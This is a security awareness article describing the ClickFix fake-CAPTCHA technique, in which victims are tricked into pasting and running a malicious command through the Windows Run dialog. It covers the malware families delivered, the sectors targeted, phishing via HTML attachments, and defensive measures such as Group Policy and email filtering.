ClickFix: A Sneaky Malware Attack That Could Infect Your PC in Three Simple Steps
A sophisticated malware deployment technique, known as “ClickFix,” has quickly gone from being part of targeted attacks to a widespread online threat. This scam exploits the familiar “I’m not a robot” CAPTCHA used to distinguish real users from bots. Unfortunately, the process of solving this CAPTCHA can lead to a disastrous malware infection, especially for unsuspecting users.
What Is ClickFix?
ClickFix is a malware scheme that uses a fake CAPTCHA challenge to deceive users into triggering a password-stealing malware download. The attack begins when a user visits a compromised or malicious website, which prompts them with a pop-up resembling a standard CAPTCHA challenge.
How the ClickFix Scam Works
The steps to triggering the malware are deceptively simple and appear innocent enough:
- Step 1: A pop-up asks the user to press the Windows key + R, which opens the Run dialog on a Windows system. The system is now poised to execute any program specified by the attacker.
- Step 2: The user is then prompted to press Ctrl + V, pasting malicious code into the Run dialog from a clipboard the attacker controls.
- Step 3: Finally, when the user presses Enter, the malware is downloaded and executed via mshta.exe, a Windows program designed for running HTML applications. This process triggers a series of malicious payloads designed to steal passwords and gain control over the victim’s machine.
Types of Malware Delivered by ClickFix
ClickFix is versatile, delivering various types of commodity malware, such as:
- XWorm
- Lumma Stealer
- VenomRAT
- AsyncRAT
- Danabot
- NetSupport RAT
These malware variants can download and execute various content, including PowerShell scripts, JavaScript, and portable executables.
Who’s Being Targeted?
ClickFix attacks are often disguised as legitimate messages, which makes them particularly dangerous. In the hospitality industry, for example, attackers have impersonated Booking.com to target hotel workers. These phishing attempts often reference fake guest reviews or promotional offers, luring users into clicking a malicious link that activates the ClickFix scam.
In a related case, the healthcare sector has also become a prime target. HEP2go, a popular physical therapy video site, was found to redirect unsuspecting visitors to ClickFix prompts. This trend is worrying, as it shows that ClickFix is not just limited to one type of industry.
Other Forms of ClickFix Attacks
ClickFix is a highly adaptable tactic. According to a U.S. Department of Health and Human Services alert, attackers have employed various methods to spread this scam, such as fake Google Chrome error pages and Facebook pop-ups. These malicious websites often mimic legitimate error notifications to trick users into clicking the fake “Fix” button.
A Familiar Phishing Tactic
The use of mshta.exe in ClickFix attacks is reminiscent of previous phishing strategies that embedded exploits in Microsoft Office macros. In response to these threats, Microsoft has taken steps to block macros from downloading content from the web by default. However, this hasn’t stopped attackers from finding new ways to exploit the system.
Phishing Emails and HTML Attachments
Proofpoint, an email security firm, has reported that many ClickFix attacks come in the form of HTML attachments disguised as Microsoft Office files. These files typically present a fake error message when opened, urging users to click a “Solution” or “How to Fix” button. Once clicked, the attack is triggered, and the malware is installed.
How to Protect Against ClickFix Attacks
Organizations and users can take several precautions to prevent ClickFix attacks:
- Microsoft Group Policy can restrict the execution of the Run command triggered by pressing Windows + R.
- Email security solutions can help detect and block phishing emails containing HTML attachments.
While ClickFix may seem like just another CAPTCHA test, it’s far from harmless. The ease with which attackers exploit it is alarming, and it’s important for both businesses and individuals to stay vigilant. By understanding the threat and taking proactive measures, users can better protect themselves from falling victim to this and other similar attacks.
Stay safe online! Always double-check before clicking on links and be cautious when interacting with suspicious pop-ups or emails.
